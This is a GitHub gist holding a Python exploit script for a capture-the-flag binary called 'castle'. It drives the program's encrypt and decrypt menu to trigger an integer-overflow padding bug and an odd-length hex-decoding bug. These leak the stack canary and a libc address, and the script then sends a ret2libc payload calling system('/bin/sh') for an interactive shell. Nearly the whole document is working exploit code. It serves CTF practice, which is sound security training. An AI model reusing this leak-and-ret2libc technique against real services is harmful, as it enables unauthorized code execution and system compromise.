Created
December 12, 2016 19:00
-
-
Save peternguyen93/121c09426f5c9afc405462d3aba6f1cd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Pwn import * | |
| import re | |
| p = Pwn(elf='./castle') | |
| # p = Pwn(elf='./castle',host='castle.svattt.org',port=31330) | |
| def go_up_set_key(user_key): | |
| p.read_until('\xF0\x9F\x94\xA5') | |
| p.sendline('w') | |
| out = p.read_utils('\xf0\x9f\x97\x9d :','detected.') | |
| if 'detected.' in out: | |
| print '[+] Heap Corrupted' | |
| return False | |
| p.sendline(user_key) | |
| return True | |
| def go_right_decrypt(enc,key=''): | |
| p.read_until('\xF0\x9F\x94\xA5') | |
| p.sendline('d') | |
| if key: | |
| out = p.read_utils('\xf0\x9f\x97\x9d :','detected.') | |
| p.sendline(key) | |
| p.read_until(' b\xc3\xaan ph\xe1\xba\xa3i:') | |
| p.sendline(enc) | |
| msg = p.read_until('\xf0\x9f\x98\xb1') | |
| msg = re.findall(r'([0-9a-f]+)',msg) | |
| if len(msg) > 5: | |
| msg = msg[4] | |
| else: | |
| msg = None | |
| return msg | |
| def go_left_encrypt(msg,key=''): | |
| p.read_until('\xF0\x9F\x94\xA5') | |
| p.sendline('a') | |
| if key: | |
| out = p.read_utils('\xf0\x9f\x97\x9d :','detected.') | |
| p.sendline(key) | |
| p.read_until(' b\xc3\xaan tr\xc3\xa1i:') | |
| p.sendline(msg) | |
| enc = p.read_until('\xf0\x9f\x98\xb1') | |
| enc = re.findall(r'([0-9a-f]+)',enc) | |
| if len(enc) > 5: | |
| enc = enc[4] | |
| else: | |
| enc = None | |
| return enc | |
| def go_down_release_key(): # free | |
| p.read_until('\xF0\x9F\x94\xA5') | |
| p.sendline('s') | |
| def exploit(): | |
| p.connect() | |
| raw_input('>') | |
| key = 'FEEDDEAD'*4 | |
| go_up_set_key(key) | |
| # trigger unpad int overflow | |
| # make set_key call corrupted function | |
| enc = go_left_encrypt('A'*64) | |
| enc = enc[:len(enc) - 2] + 'AA' | |
| go_right_decrypt(enc) | |
| # because corrupted is called by set_key | |
| # corrupted function has stack frame smaller than | |
| # encrypt function so that cookie may in some where | |
| # in encrypt function stack. | |
| # encrypt() function | |
| # - ret | |
| # - ebp | |
| # - canary | |
| # - buf[256] | |
| # - buf[512] | |
| # when set_key() they create stack frame base on current esp | |
| # of encrypt() if corrupted() (100 bytes) is called it's stack frame is | |
| # allocated base on set_key() , again we have 2 chances make | |
| # canary in encrypt() stack frame. | |
| go_up_set_key(key) | |
| # trigger bug in hexdecode function because length | |
| # of hex string is odd number so that hexdecode will fail | |
| # that lead to uninitialize stack so that we may leak | |
| # canary, stack, heap, sth in heap | |
| enc = go_left_encrypt('A'*257,key) | |
| data = go_right_decrypt(enc) | |
| data = data.decode('hex') | |
| canary = p.unpack(data[64:68]) | |
| libc = p.unpack(data[88:92]) - 0x6a47b | |
| system = libc + 0x3ada0 | |
| bin_sh = libc + 0x15b82b | |
| print 'Canary:',hex(canary) | |
| print 'Libc:',hex(libc) | |
| print 'system():',hex(system) | |
| print '"/bin/sh":',hex(bin_sh) | |
| payload = p.pA( | |
| canary, | |
| 0x41414141, | |
| system, | |
| 0x41414141, | |
| bin_sh, | |
| ) | |
| data = payload.encode('hex').encode('hex') | |
| data = data.ljust(512,'A') | |
| p.read_until('\xF0\x9F\x94\xA5') | |
| p.sendline('a') | |
| p.read_until(' b\xc3\xaan tr\xc3\xa1i:') | |
| p.sendline(data) | |
| p.io() | |
| exploit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment